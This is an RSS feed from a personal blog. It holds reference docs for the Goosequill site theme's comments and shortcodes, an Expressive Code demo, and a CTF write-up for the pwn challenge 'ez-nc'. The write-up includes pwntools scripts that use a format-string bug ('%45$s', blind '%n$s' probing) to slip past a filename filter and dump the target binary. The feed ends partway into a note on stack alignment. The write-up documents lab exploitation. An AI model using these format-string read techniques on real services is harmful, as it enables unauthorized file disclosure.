<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Vesper Vei</title><description>Personal notes, writings, and experiments by Vesper Vei.</description><link>https://goosequill.erina.top/</link><item><title>Goosequill Comments Configuration Reference</title><link>https://goosequill.erina.top/en/blog/comments-reference/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/comments-reference/</guid><description>A compact reference for Goosequill comment system configuration, covering both Giscus and Waline options.</description><pubDate>Wed, 22 Apr 2026 16:00:00 GMT</pubDate><content:encoded>Goosequill currently supports two comment providers through `siteConfig.comments`:

- `giscus`
- `waline`

You should configure exactly one provider at a time.

## Config shape

Set `comments` in `src/config.ts`:

```ts
comments: {
  provider: &quot;giscus&quot; | &quot;waline&quot;,
}
```

## Giscus

### Minimal example

```ts
comments: {
  provider: &quot;giscus&quot;,
  repo: &quot;owner/repo&quot;,
  repoId: &quot;R_kgDOExample&quot;,
  category: &quot;Announcements&quot;,
  categoryId: &quot;DIC_kwDOExample&quot;,
}
```

### Parameters

| Parameter | Type | Required | Default | Description |
| --- | --- | --- | --- | --- |
| `provider` | `&quot;giscus&quot;` | yes | — | Selects Giscus |
| `repo` | `string` | yes | — | GitHub repo in `owner/name` form |
| `repoId` | `string` | yes | — | Giscus repository ID |
| `category` | `string` | yes | — | GitHub Discussions category name |
| `categoryId` | `string` | yes | — | GitHub Discussions category ID |
| `mapping` | `&quot;pathname&quot; \| &quot;url&quot; \| &quot;title&quot; \| &quot;og:title&quot; \| &quot;specific&quot; \| &quot;number&quot;` | no | `&quot;pathname&quot;` | How pages map to discussion threads |
| `strict` | `&quot;0&quot; \| &quot;1&quot;` | no | `&quot;0&quot;` | Whether mapping must match strictly |
| `reactionsEnabled` | `&quot;0&quot; \| &quot;1&quot;` | no | `&quot;1&quot;` | Enables reactions in the comments UI |
| `emitMetadata` | `&quot;0&quot; \| &quot;1&quot;` | no | `&quot;0&quot;` | Emits discussion metadata into the page |
| `inputPosition` | `&quot;top&quot; \| &quot;bottom&quot;` | no | `&quot;top&quot;` | Composer position |
| `theme` | `string` | no | fallback only | Shared theme fallback for both light and dark |
| `theme_light` | `string` | no | `&quot;light&quot;` | Giscus theme used in light mode |
| `theme_dark` | `string` | no | `&quot;dark&quot;` | Giscus theme used in dark mode |
| `lang` | `string` | no | `&quot;en&quot;` | Giscus UI language |
| `loading` | `&quot;lazy&quot; \| &quot;eager&quot;` | no | `&quot;lazy&quot;` | Script loading strategy |

### Notes

- `repo`, `repoId`, `category`, and `categoryId` are the hard requirements in Goosequill.
- Goosequill syncs Giscus theme with the site `data-theme` state and system color scheme.
- If `theme_light` or `theme_dark` is omitted, Goosequill falls back to `theme`, then to `light` or `dark`.

## Waline

### Minimal example

```ts
comments: {
  provider: &quot;waline&quot;,
  serverURL: &quot;https://your-waline-server.example.com&quot;,
}
```

### Parameters

| Parameter | Type | Required | Default | Description |
| --- | --- | --- | --- | --- |
| `provider` | `&quot;waline&quot;` | yes | — | Selects Waline |
| `serverURL` | `string` | yes | — | Waline server endpoint |
| `lang` | `&quot;zh&quot; \| &quot;zh-CN&quot; \| &quot;zh-TW&quot; \| &quot;en&quot; \| &quot;en-US&quot; \| &quot;jp&quot; \| &quot;jp-JP&quot; \| &quot;pt-BR&quot; \| &quot;ru&quot; \| &quot;ru-RU&quot; \| &quot;fr-FR&quot; \| &quot;fr&quot; \| &quot;vi&quot; \| &quot;vi-vn&quot; \| &quot;es&quot; \| &quot;es-MX&quot;` | no | `&quot;en&quot;` | Waline UI language |
| `emoji` | `string[] \| false` | no | `false` | Emoji source list, or disable emojis |
| `meta` | `(&quot;nick&quot; \| &quot;mail&quot; \| &quot;link&quot;)[]` | no | `[&quot;nick&quot;, &quot;mail&quot;, &quot;link&quot;]` | Input fields shown in the form |
| `requiredMeta` | `(&quot;nick&quot; \| &quot;mail&quot; \| &quot;link&quot;)[]` | no | `[]` | Fields that become required |
| `login` | `&quot;enable&quot; \| &quot;disable&quot; \| &quot;force&quot;` | no | `&quot;enable&quot;` | Login mode |
| `wordLimit` | `number \| [number, number]` | no | `0` | Text length limit |
| `pageSize` | `number` | no | `10` | Comments per page |
| `search` | `boolean` | no | `false` | Enables admin search in the panel |
| `reaction` | `boolean \| string[]` | no | `false` | Enables reactions or provides custom reaction images |
| `pageview` | `boolean` | no | `false` | Enables pageview counter |
| `noCopyright` | `boolean` | no | `false` | Hides Waline copyright |
| `noRss` | `boolean` | no | `false` | Disables RSS entry output |

### Notes

- Goosequill currently keys Waline threads by `window.location.pathname`.
- The site theme is converted to a Waline `dark` boolean and updated when theme mode changes.
- `serverURL` is the only hard requirement besides `provider`.

## Recommended starting point

If you want the smallest working configuration:

- Use Giscus when your content and identity already live around GitHub Discussions.
- Use Waline when you want a self-hosted backend and more form-level controls.</content:encoded></item><item><title>Goosequill Shortcodes Reference</title><link>https://goosequill.erina.top/en/blog/shortcodes-reference/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/shortcodes-reference/</guid><description>A complete reference for Goosequill built-in shortcodes, including purposes, props, defaults, and usage examples.</description><pubDate>Sun, 19 Apr 2026 16:00:00 GMT</pubDate><content:encoded>Currently available shortcodes:

- `Alert`
- `ImageCode`
- `Video`
- `Youtube`
- `Bilibili`
- `Spotify`
- `Steam`
- `CRT`

## How to use them

In MDX, these components are already injected through `ExtendMarkdown.astro`, so you can write them directly like this:

```mdx
&lt;Alert type=&quot;note&quot;&gt;Hello&lt;/Alert&gt;
```

No extra import is required.

## 1. `Alert`

Renders a GitHub-style alert block.

### Props

| Prop | Type | Default | Description |
| --- | --- | --- | --- |
| `type` | `&apos;note&apos; \| &apos;tip&apos; \| &apos;important&apos; \| &apos;warning&apos; \| &apos;caution&apos;` | `&apos;note&apos;` | Alert style |

### Example

```mdx
&lt;Alert type=&quot;note&quot;&gt;
This is a note.
&lt;/Alert&gt;

&lt;Alert type=&quot;warning&quot;&gt;
This is a warning.
&lt;/Alert&gt;
```

### Notes

- Content is passed through the default slot.
- If `type` is omitted, `note` is used.

## 2. `ImageCode`

Renders an image with a set of combinable style classes.

### Props

| Prop | Type | Default | Description |
| --- | --- | --- | --- |
| `url` | `string` | — | Original image URL, required |
| `url_min` | `string` | `undefined` | Preview/compressed image URL; when provided, the preview is shown and links to `url` |
| `alt` | `string` | `&apos;&apos;` | Alt text |
| `full` | `boolean` | `false` | Makes the image fill the content width |
| `full_bleed` | `boolean` | `false` | Lets the image extend beyond the content column |
| `start` | `boolean` | `false` | Floats the image to the start side |
| `end` | `boolean` | `false` | Floats the image to the end side |
| `pixels` | `boolean` | `false` | Uses pixel-art style rendering |
| `transparent` | `boolean` | `false` | Better suited for transparent images |
| `no_hover` | `boolean` | `false` | Disables hover zoom |
| `spoiler` | `boolean` | `false` | Applies spoiler masking |
| `solid` | `boolean` | `false` | Stronger spoiler masking, used with `spoiler` |

### Example

```mdx
&lt;ImageCode
  url=&quot;/images/example.png&quot;
  alt=&quot;Example image&quot;
  no_hover=&quot;true&quot;
/&gt;

&lt;ImageCode
  url=&quot;/images/original.png&quot;
  url_min=&quot;/images/preview.png&quot;
  alt=&quot;Clickable preview&quot;
  full=&quot;true&quot;
/&gt;
```

### Notes

- `solid` only has an effect when `spoiler` is enabled.
- When `url_min` is present, the component renders a linked preview image pointing to `url`.
- Layout flags like `full`, `full_bleed`, `start`, and `end` are best used intentionally rather than all together.

## 3. `Video`

Renders a local or remote video and supports most of the same presentation classes as `ImageCode`.

### Props

| Prop | Type | Default | Description |
| --- | --- | --- | --- |
| `url` | `string` | — | Video URL, required |
| `alt` | `string` | `&apos;&apos;` | Accessibility text used as `aria-label` |
| `full` | `boolean` | `false` | Fills the content width |
| `full_bleed` | `boolean` | `false` | Wider presentation |
| `start` | `boolean` | `false` | Floats to the start side |
| `end` | `boolean` | `false` | Floats to the end side |
| `pixels` | `boolean` | `false` | Pixel-art rendering style |
| `transparent` | `boolean` | `false` | Transparent presentation style |
| `spoiler` | `boolean` | `false` | Spoiler masking |
| `solid` | `boolean` | `false` | Stronger masking when used with `spoiler` |
| `autoplay` | `boolean` | `false` | Autoplays the video |
| `controls` | `boolean` | `false` | Shows native controls |
| `loop` | `boolean` | `false` | Loops playback |
| `muted` | `boolean` | `false` | Starts muted |
| `playsinline` | `boolean` | `false` | Requests inline playback |

### Example

```mdx
&lt;Video
  url=&quot;/videos/demo.webm&quot;
  alt=&quot;Demo video&quot;
  controls=&quot;true&quot;
/&gt;

&lt;Video
  url=&quot;/videos/hero.webm&quot;
  full_bleed=&quot;true&quot;
  autoplay=&quot;true&quot;
  muted=&quot;true&quot;
  loop=&quot;true&quot;
  playsinline=&quot;true&quot;
/&gt;
```

### Notes

- The component passes `url` directly to `&lt;video src&gt;` and does not infer formats.
- `solid` only matters when `spoiler` is enabled.
- Unlike `ImageCode`, `Video` does not support `url_min` or `no_hover`.

## 4. `Youtube`

Embeds a YouTube video using the `youtube-nocookie.com` domain.

### Props

| Prop | Type | Default | Description |
| --- | --- | --- | --- |
| `id` | `string` | — | YouTube video ID, required |
| `autoplay` | `boolean` | `false` | Whether to autoplay |
| `start` | `number` | `undefined` | Start time in seconds |

### Example

```mdx
&lt;Youtube id=&quot;0Da8ZhKcNKQ&quot; /&gt;

&lt;Youtube id=&quot;0Da8ZhKcNKQ&quot; autoplay=&quot;true&quot; start={30} /&gt;
```

### Notes

- The embed URL format is `https://www.youtube-nocookie.com/embed/&lt;id&gt;`.
- Query parameters are only appended when corresponding props are provided.

## 5. `Bilibili`

Embeds the Bilibili player.

### Props

| Prop | Type | Default | Description |
| --- | --- | --- | --- |
| `bvid` | `string` | `undefined` | BV ID |
| `aid` | `string` | `undefined` | AV ID |
| `cid` | `string` | `undefined` | Resource / danmaku ID |
| `page` | `number` | `1` | Part number |
| `autoplay` | `boolean` | `false` | Whether to autoplay |

### Example

```mdx
&lt;Bilibili bvid=&quot;BV1yt4y1Q7SS&quot; /&gt;

&lt;Bilibili
  bvid=&quot;BV1yt4y1Q7SS&quot;
  page={2}
  autoplay=&quot;true&quot;
/&gt;
```

### Notes

- The component builds a URL like `//player.bilibili.com/player.html?...`.
- It always appends `isOutside=true`.
- All ID props are technically optional, but in practice you should usually provide at least `bvid` or `aid`.

## 6. `Spotify`

Embeds Spotify content such as albums, playlists, tracks, shows, and episodes.

### Props

| Prop | Type | Default | Description |
| --- | --- | --- | --- |
| `type` | `&apos;track&apos; \| &apos;album&apos; \| &apos;artist&apos; \| &apos;playlist&apos; \| &apos;episode&apos; \| &apos;show&apos;` | `undefined` | Generic type form |
| `id` | `string` | `undefined` | Content ID used with `type` |
| `track` | `string` | `undefined` | Track ID shorthand |
| `album` | `string` | `undefined` | Album ID shorthand |
| `artist` | `string` | `undefined` | Artist ID shorthand |
| `playlist` | `string` | `undefined` | Playlist ID shorthand |
| `episode` | `string` | `undefined` | Episode ID shorthand |
| `show` | `string` | `undefined` | Show ID shorthand |
| `height` | `string \| number` | auto | Custom iframe height |

### Example

```mdx
&lt;Spotify album=&quot;5gDJVilnZpPt8zwBC467UH&quot; /&gt;

&lt;Spotify type=&quot;track&quot; id=&quot;11dFghVXANMlKmJXsNCbNl&quot; /&gt;

&lt;Spotify playlist=&quot;37i9dQZF1DXcBWIGoYBM5M&quot; height={480} /&gt;
```

### Notes

- You can pass props in two ways:
  - shorthand: `album=&quot;...&quot;`, `track=&quot;...&quot;`, etc.
  - generic: `type=&quot;album&quot; id=&quot;...&quot;`
- If both are present, shorthand props take priority.
- If neither shorthand props nor a valid `type + id` pair is provided, the component throws an error.
- Default height:
  - `track` → `152`
  - all other types → `352`

## 7. `Steam`

Displays a Steam store card.

### Props

| Prop | Type | Default | Description |
| --- | --- | --- | --- |
| `appid` | `string \| number` | — | Steam App ID, required |
| `variant` | `&apos;horizontal&apos; \| &apos;vertical&apos;` | `&apos;horizontal&apos;` | Card layout |

### Example

```mdx
&lt;Steam appid=&quot;1127400&quot; /&gt;

&lt;Steam appid=&quot;730&quot; variant=&quot;vertical&quot; /&gt;
```

### Notes

- The component builds:
  - Store URL: `https://store.steampowered.com/app/&lt;appid&gt;/`
  - Horizontal image: `header.jpg`
  - Vertical image: `library_600x900_2x.jpg`
- In `vertical` mode, the media container gets a fixed width of `200px`.
- It does not call the Steam API; it only constructs URLs from the given `appid`.

## 8. `CRT`

Renders a CRT-styled code container.

### Props

| Prop | Type | Default | Description |
| --- | --- | --- | --- |
| `code` | `string` | — | Code text to display, required |
| `no_scanlines` | `boolean` | `false` | Disables scanline effect |

### Example

```mdx
&lt;CRT code={`
Hello, CRT
`} /&gt;

&lt;CRT
  no_scanlines=&quot;true&quot;
  code={`
No scanlines here
`}
/&gt;
```

### Notes

- If `code` starts with a newline, the component strips that first newline for cleaner multiline template usage.
- When `no_scanlines` is `false`, the component also adds the `scanlines` class.

## Practical suggestions

### Media

- Need a preview image that links to the original: use `ImageCode` with `url_min`
- Need spoiler masking: use `spoiler`, and add `solid` for a stronger effect
- Need a full-width image inside the content column: use `full`
- Need content that breaks beyond the column: use `full_bleed`

### Embeds

- YouTube: pass `id`
- Bilibili: prefer `bvid`
- Spotify: prefer shorthand props like `album=&quot;...&quot;`
- Steam: pass `appid`, then choose `variant` based on layout needs

### Alerts and presentation

- Use `Alert` for callouts
- Use `CRT` for retro terminal-styled code
- Use normal Markdown code fences for regular syntax-highlighted code unless you specifically want the CRT look</content:encoded></item><item><title>[polarisctf] ez-nc</title><link>https://goosequill.erina.top/en/blog/202604062330/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202604062330/</guid><description>Import notes for [polarisctf] ez-nc</description><pubDate>Mon, 06 Apr 2026 15:30:00 GMT</pubDate><content:encoded>&gt; [!note]
&gt; Related entry: [[PWN题目索引]]
## Challenge Summary

&gt; [!info] Basic Information
&gt; - **Competition**: polarisctf
&gt; - **Challenge**: ez-nc
&gt; - **Difficulty**: ★★★☆☆
&gt; - **Architecture**: amd64
&gt; - **libc / Environment**: To be added
&gt; - **Protection Mechanisms**: NX

&gt; [!abstract] One-line attack chain
&gt; BROP + format string vulnerability -&gt; use %n\$p to probe stack space -&gt; use %n\$s to leak the ELF file and save it -&gt; reverse engineer with IDA

## Program Profile and Attack Surface
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202604091038626.png)

### Program Function Overview
The challenge ships no files. After starting the container and connecting with nc, the service prints `Enter the filename to download:`, but testing showed that nothing is actually downloaded; the service only prints the contents of the named file.
The target file `ez-nc` itself is filtered, so it cannot be requested by name.

### Initial Attack Surface Screening
Since the service takes a string from the user, I tried a format string attack first. `%p` printed a stack address, and the input is limited in length (len_max=7), so I initially suspected the program used `snprintf()`.
The next step is to probe the stack blind, BROP-style.
## Pre-exploitation Constraints
### Key Constraints
- Which protection mechanisms currently have a real impact on exploitation?
- What are the limits on input length, number of interactions, character set, alignment, stack balance, etc.?
- Which constraints must be solved first, and which are only implementation details?
So far the only obstacles found are the string filter and the input length limit. The limit rules out the conventional long payload `%1$p.%2$p.%3$p.%4$p....`; instead, a for loop sends one short payload per index, built as `f&quot;%{i}$p&quot;`.
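
The per-index loop described above can be sketched as follows. This is only an illustration: `build_payloads` and `MAX_LEN` are hypothetical names, and the 7-byte cap is simply the limit observed in this challenge.

```python
MAX_LEN = 7  # assumption: the input limit observed in this challenge (len_max=7)


def build_payloads(start, stop, conv="p", max_len=MAX_LEN):
    """Return one positional format-string payload per stack index."""
    payloads = []
    for i in range(start, stop + 1):
        payload = f"%{i}${conv}".encode()
        # Skip anything the service would truncate.
        if len(payload) > max_len:
            continue
        payloads.append(payload)
    return payloads


# One short payload per index instead of a single long string.
for payload in build_payloads(1, 5):
    print(payload)
```

Passing `conv="s"` produces the `%n$s` payloads used for string extraction later on.
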
## Primitive Extraction

&gt; [!note]
&gt; This section explains how the vulnerability is transformed into reusable primitives.
### Leak Capability and Acquisition of Critical Information
#### Leak Results and Critical Information
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202604091055664.png)
I probed indices `1~50` with `%p` and obtained a set of stack values. These slots hold local variable data (if the probed index is high enough, information about the binary itself can be obtained!)
exp --&gt; [[#Route 1]]
#### Support for Subsequent Exploitation
Next, `%n$s` is used to read the strings that those stack slots point to. Note that if a slot does not hold a valid string pointer, the program crashes **(Segfault)**, so the script needs solid reconnection logic.
Crash and reconnect:
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202604091101100.png)
Successful hit:
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202604091103871.png)
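
The reconnection logic mentioned above might look like the sketch below. `probe_indices` is a hypothetical name; `make_conn` and `interact` are assumed to behave like `create_conn` and `interact_copy` in the exp summary, with `interact` returning `None` when the target crashes or times out.

```python
def probe_indices(make_conn, interact, indices):
    """Send %N$s for each index, reconnecting whenever the target dies."""
    results = {}
    io = make_conn()
    for i in indices:
        payload = f"%{i}$s".encode()
        reply = interact(io, payload)
        if reply is None:
            # The service crashed or timed out: drop this connection,
            # open a fresh one, and move on to the next index.
            io.close()
            io = make_conn()
            continue
        results[i] = reply
    io.close()
    return results
```

Indices that crash the service are simply missing from the returned dictionary, which makes the surviving hits easy to review afterwards.
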


## Route Selection
When solving this challenge, I sent the output of Index 45 to an AI, which found the flag among the large number of bytes. Later, reading other people&apos;s writeups, I found that the output of Index 45 can also be saved as a binary file and reverse engineered in IDA, where the flag sits in the `.rodata` section.
So this note records both routes.

## Attack Chain Breakdown

### Route 1: Blind String Extraction
Directly perform `%n$s` blind extraction on 1~50:
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202604091107665.png)
The flag is hidden in these returned bytes, but manual filtering is too difficult and it is easy to miss it by eye.
(There are still 2 more pages below, too long to show.)

### Route 2: Download and Reverse Engineer with IDA
The screenshot above shows an `ELF` file header string! This means the output for Index 45 is the content of a binary, i.e. an ELF file such as `ez-nc`. The stack address `0x7fffbdac7e10` -&gt; an address in the `.data` segment that stores the string `ez-nc`. The program expands this string into the first argument of `snprintf()`, which bypasses the program&apos;s filter on the string `ez-nc`!
A script can be written to download this binary file --&gt; [[#Route 2:]]
&gt; [!tip]
&gt; I used the writeup author&apos;s script here, but the downloaded ELF file cannot be directly reverse engineered in IDA! [[#Pitfall Notes]] will explain this later.


Load it into IDA for analysis:
![longshot20260409185707.jpg](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202604091857289.jpg)
The program performs a blacklist check with `strstr(s, &quot;ez-nc&quot;)`, but then calls `snprintf(filename, 0x58u, s)`, passing user input directly as the format string, which is a format string vulnerability.  
Inputting `%45$s` (the 45th stack offset happens to hold `argv[0]`, i.e. the program name `ez-nc`) passes the blacklist check, yet `filename` is formatted as `ez-nc`. This turns the bug into an arbitrary file read and downloads the program binary itself.
P.S. I don&apos;t know why the downloaded binary had issues; IDA could not locate the symbol table.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202604091902123.png)
It was discovered that the flag was directly hardcoded in the `.rodata` data section of the ELF file.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202604091903776.png)


## Pitfalls and Stability

### Pitfall Notes
Fill in here why the initial ELF could not be reverse engineered properly in IDA:
### Pitfall Notes and Stability Fixes

#### Where It First Went Wrong
- At which step did the first version of the exploit fail earliest?
- At the time, did the error look like an offset issue, a stack balance issue, or an environment issue?
- Why was this error not easy to realize at first?

#### Root Cause Identification
- What was the final confirmed root cause?
- Was it a local/remote difference, a symbol calculation error, gadget contamination, or an interaction timing issue?
- Which debugging evidence really helped you pinpoint the issue?

#### Stable Version Fixes
- Compared with the initial version, what were the most critical fixes in the final version?
- Which fixes merely made it &quot;work,&quot; and which truly made it &quot;stable&quot;?
- If you encounter a similar pitfall again in the future, what should you check first?


## Pattern Transfer

### Pattern Recognition
- What is the most critical recognition signal in this challenge?
- Which local symptom should immediately raise a flag the next time you solve a challenge?

### Reuse Through Transfer
- What kind of structure should make you think of this route first next time?
- What kind of reusable exploitation template can be distilled from this challenge?

### Pattern Recognition and Transfer

#### Recognition Signals
- What structural signal in this challenge is most worth remembering?
- Is it a certain input model, a certain heap state, a certain leak method, or a certain convergence pattern?
- When these signals appear together, why should this route be prioritized?

#### Transfer Pattern
- What kind of reusable pattern can this challenge ultimately be abstracted into?
- If it is changed into a similar challenge with different details, which parts can be reused directly and which parts must be rebuilt?
- Next time you encounter a similar challenge, which three points should be verified first?


## exp Summary:
### Route 1
```python
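from pwn import *  # provides remote, process, context

# Assumption: BlindFmtTool is importable from my_tool.py (see the note below).
from my_tool import BlindFmtTool


def create_conn() -&gt; remote:
    # Open a fresh connection to the challenge instance
    return remote(&quot;nc1.ctfplus.cn&quot;, 15894)


def interact_copy(io: remote | process, payload: bytes) -&gt; bytes | None:
    # Send one payload; return the reply, or None on a crash or timeout
    context.timeout = 0.5
    try:
        io.recvuntil(b&quot;Enter the filename to download:&quot;)
        io.sendline(payload)
        res = io.recvuntil(b&quot; not existed&quot;, drop=True)
        return res
    except Exception:
        return None


# BlindFmtTool is a helper class I wrote myself; it handles reconnecting
# and can be found on my GitHub as &quot;my_tool.py&quot;
brop = BlindFmtTool(create_conn, interact_copy)
# Wrapper for stack probing:
brop.dump_stack_ptrs()
# Wrapper for blind string extraction:
brop.dump_strings()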
```

### Route 2:
exp for downloading the Index 45 ELF file:
```python
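from pwn import *

context.log_level = &quot;error&quot;


def download():
    host = &quot;nc1.ctfplus.cn&quot;
    port = 32441
    io = remote(host, port)
    io.recvuntil(b&quot;download: &quot;)
    # %45$s expands to argv[0] (&quot;ez-nc&quot;), slipping past the filename filter
    io.sendline(b&quot;%45$s&quot;)
    # Read until the server closes the connection or 3 seconds pass
    data = io.recvall(timeout=3)
    io.close()
    # Only save the reply if it looks like an ELF image
    if b&quot;ELF&quot; in data:
        with open(&quot;ez-nc&quot;, &quot;wb&quot;) as f:
            f.write(data)


if __name__ == &quot;__main__&quot;:
    download()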
```</content:encoded></item><item><title>Expressive Code Example</title><link>https://goosequill.erina.top/en/blog/expressive-code/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/expressive-code/</guid><description>How code blocks look in Markdown using Expressive Code.</description><pubDate>Tue, 31 Mar 2026 00:00:00 GMT</pubDate><content:encoded>Here, we&apos;ll explore how code blocks look using [Expressive Code](https://expressive-code.com/). The provided examples are based on the official documentation, which you can refer to for further details.

## Expressive Code

### Syntax Highlighting

[Syntax Highlighting](https://expressive-code.com/key-features/syntax-highlighting/)

#### Regular syntax highlighting

```js
console.log(&apos;This code is syntax highlighted!&apos;)
```

#### Rendering ANSI escape sequences

```ansi
ANSI colors:
- Regular: Red Green Yellow Blue Magenta Cyan
- Bold:    Red Green Yellow Blue Magenta Cyan
- Dimmed:  Red Green Yellow Blue Magenta Cyan

256 colors (showing colors 160-177):
160 161 162 163 164 165
166 167 168 169 170 171
172 173 174 175 176 177

Full RGB colors:
ForestGreen - RGB(34, 139, 34)

Text formatting: Bold Dimmed Italic Underline
```

### Editor &amp; Terminal Frames

[Editor &amp; Terminal Frames](https://expressive-code.com/key-features/frames/)

#### Code editor frames

```js title=&quot;my-test-file.js&quot;
console.log(&apos;Title attribute example&apos;)
```

---

```html
&lt;!-- src/content/index.html --&gt;
&lt;div&gt;File name comment example&lt;/div&gt;
```

#### Terminal frames

```bash
echo &quot;This terminal frame has no title&quot;
```

---

```powershell title=&quot;PowerShell terminal example&quot;
Write-Output &quot;This one has a title!&quot;
```

#### Overriding frame types

```sh frame=&quot;none&quot;
echo &quot;Look ma, no frame!&quot;
```

---

```ps frame=&quot;code&quot; title=&quot;PowerShell Profile.ps1&quot;
# Without overriding, this would be a terminal frame
function Watch-Tail { Get-Content -Tail 20 -Wait $args }
New-Alias tail Watch-Tail
```

### Text &amp; Line Markers

[Text &amp; Line Markers](https://expressive-code.com/key-features/text-markers/)

#### Marking full lines &amp; line ranges

```js {1, 4, 7-8}
// Line 1 - targeted by line number
// Line 2
// Line 3
// Line 4 - targeted by line number
// Line 5
// Line 6
// Line 7 - targeted by range &quot;7-8&quot;
// Line 8 - targeted by range &quot;7-8&quot;
```

#### Selecting line marker types (mark, ins, del)

```js title=&quot;line-markers.js&quot; del={2} ins={3-4} {6}
function demo() {
  console.log(&apos;this line is marked as deleted&apos;)
  // This line and the next one are marked as inserted
  console.log(&apos;this is the second inserted line&apos;)

  return &apos;this line uses the neutral default marker type&apos;
}
```

#### Adding labels to line markers

```jsx {&quot;1&quot;:5} del={&quot;2&quot;:7-8} ins={&quot;3&quot;:10-12}
// labeled-line-markers.jsx
&lt;button
  role=&quot;button&quot;
  {...props}
  value={value}
  className={buttonClassName}
  disabled={disabled}
  active={active}
&gt;
  {children &amp;&amp;
    !active &amp;&amp;
    (typeof children === &apos;string&apos; ? &lt;span&gt;{children}&lt;/span&gt; : children)}
&lt;/button&gt;
```

#### Adding long labels on their own lines

```jsx {&quot;1. Provide the value prop here:&quot;:5-6} del={&quot;2. Remove the disabled and active states:&quot;:8-10} ins={&quot;3. Add this to render the children inside the button:&quot;:12-15}
// labeled-line-markers.jsx
&lt;button
  role=&quot;button&quot;
  {...props}

  value={value}
  className={buttonClassName}

  disabled={disabled}
  active={active}
&gt;

  {children &amp;&amp;
    !active &amp;&amp;
    (typeof children === &apos;string&apos; ? &lt;span&gt;{children}&lt;/span&gt; : children)}
&lt;/button&gt;
```

#### Using diff-like syntax

```diff
+this line will be marked as inserted
-this line will be marked as deleted
this is a regular line
```

---

```diff
--- a/README.md
+++ b/README.md
@@ -1,3 +1,4 @@
+this is an actual diff file
-all contents will remain unmodified
 no whitespace will be removed either
```

#### Combining syntax highlighting with diff-like syntax

```diff lang=&quot;js&quot;
  function thisIsJavaScript() {
    // This entire block gets highlighted as JavaScript,
    // and we can still add diff markers to it!
-   console.log(&apos;Old code to be removed&apos;)
+   console.log(&apos;New and shiny code!&apos;)
  }
```

#### Marking individual text inside lines

```js &quot;given text&quot;
function demo() {
  // Mark any given text inside lines
  return &apos;Multiple matches of the given text are supported&apos;;
}
```

#### Regular expressions

```ts /ye[sp]/
console.log(&apos;The words yes and yep will be marked.&apos;)
```

#### Escaping forward slashes

```sh /\/ho.*\//
echo &quot;Test&quot; &gt; /home/test.txt
```

#### Selecting inline marker types (mark, ins, del)

```js &quot;return true;&quot; ins=&quot;inserted&quot; del=&quot;deleted&quot;
function demo() {
  console.log(&apos;These are inserted and deleted marker types&apos;);
  // The return statement uses the default marker type
  return true;
}
```

### Word Wrap

[Word Wrap](https://expressive-code.com/key-features/word-wrap/)

#### Configuring word wrap per block

```js wrap
// Example with wrap
function getLongString() {
  return &apos;This is a very long string that will most probably not fit into the available space unless the container is extremely wide&apos;
}
```

---

```js wrap=false
// Example with wrap=false
function getLongString() {
  return &apos;This is a very long string that will most probably not fit into the available space unless the container is extremely wide&apos;
}
```

#### Configuring indentation of wrapped lines

```js wrap preserveIndent
// Example with preserveIndent (enabled by default)
function getLongString() {
  return &apos;This is a very long string that will most probably not fit into the available space unless the container is extremely wide&apos;
}
```

---

```js wrap preserveIndent=false
// Example with preserveIndent=false
function getLongString() {
  return &apos;This is a very long string that will most probably not fit into the available space unless the container is extremely wide&apos;
}
```

## Collapsible Sections

[Collapsible Sections](https://expressive-code.com/plugins/collapsible-sections/)

```js collapse={1-5, 12-14, 21-24}
// All this boilerplate setup code will be collapsed
import { someBoilerplateEngine } from &apos;@example/some-boilerplate&apos;
import { evenMoreBoilerplate } from &apos;@example/even-more-boilerplate&apos;

const engine = someBoilerplateEngine(evenMoreBoilerplate())

// This part of the code will be visible by default
engine.doSomething(1, 2, 3, calcFn)

function calcFn() {
  // You can have multiple collapsed sections
  const a = 1
  const b = 2
  const c = a + b

  // This will remain visible
  console.log(`Calculation result: ${a} + ${b} = ${c}`)
  return c
}

// All this code until the end of the block will be collapsed again
engine.closeConnection()
engine.freeMemory()
engine.shutdown({ reason: &apos;End of example boilerplate code&apos; })
```

## Line Numbers

[Line Numbers](https://expressive-code.com/plugins/line-numbers/)

### Displaying line numbers per block

```js showLineNumbers
// This code block will show line numbers
console.log(&apos;Greetings from line 2!&apos;)
console.log(&apos;I am on line 3&apos;)
```

---

```js showLineNumbers=false
// Line numbers are disabled for this block
console.log(&apos;Hello?&apos;)
console.log(&apos;Sorry, do you know what line I am on?&apos;)
```

### Changing the starting line number

```js showLineNumbers startLineNumber=5
console.log(&apos;Greetings from line 5!&apos;)
console.log(&apos;I am on line 6&apos;)
```</content:encoded></item><item><title>16-Byte Alignment</title><link>https://goosequill.erina.top/en/blog/202603051050/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202603051050/</guid><description>Import notes on 16-byte alignment</description><pubDate>Thu, 05 Mar 2026 03:10:00 GMT</pubDate><content:encoded>##  16-Byte Alignment

In the world of Pwn, **16-byte alignment (Stack Alignment)** is absolutely a beginner’s “number one killer.” You may have built a perfect ROP chain with flawless logic, yet when running locally or attacking remotely, the program mysteriously crashes directly with `SIGSEGV` (segmentation fault) inside `system` or `printf`.

It feels like you prepared a master key, only to find the lock won’t open because the core is off by 1 millimeter.

---

### 1. Why does this rule exist? (Hardware’s “OCD”)
This rule comes from the x86-64 **SSE (Streaming SIMD Extensions)** instruction set.
For maximum performance, when the CPU processes 128-bit (16-byte) data (such as floating-point operations), it uses instructions like `movaps` (Move Aligned Packed Single-Precision Floating-Point Values).
- **Unwritten rule**: `movaps` requires the memory address being operated on to **be divisible by 16** (that is, the last hexadecimal digit of the address must be `0`).
- **Consequence**: If the address is not aligned, the CPU raises a general-protection fault, which Linux delivers to the process as `SIGSEGV`.

Modern `glibc` functions (such as `printf` and `system`) make heavy use of these instructions internally for optimization.

---

### 2. The “dynamic changes” of 16-byte alignment
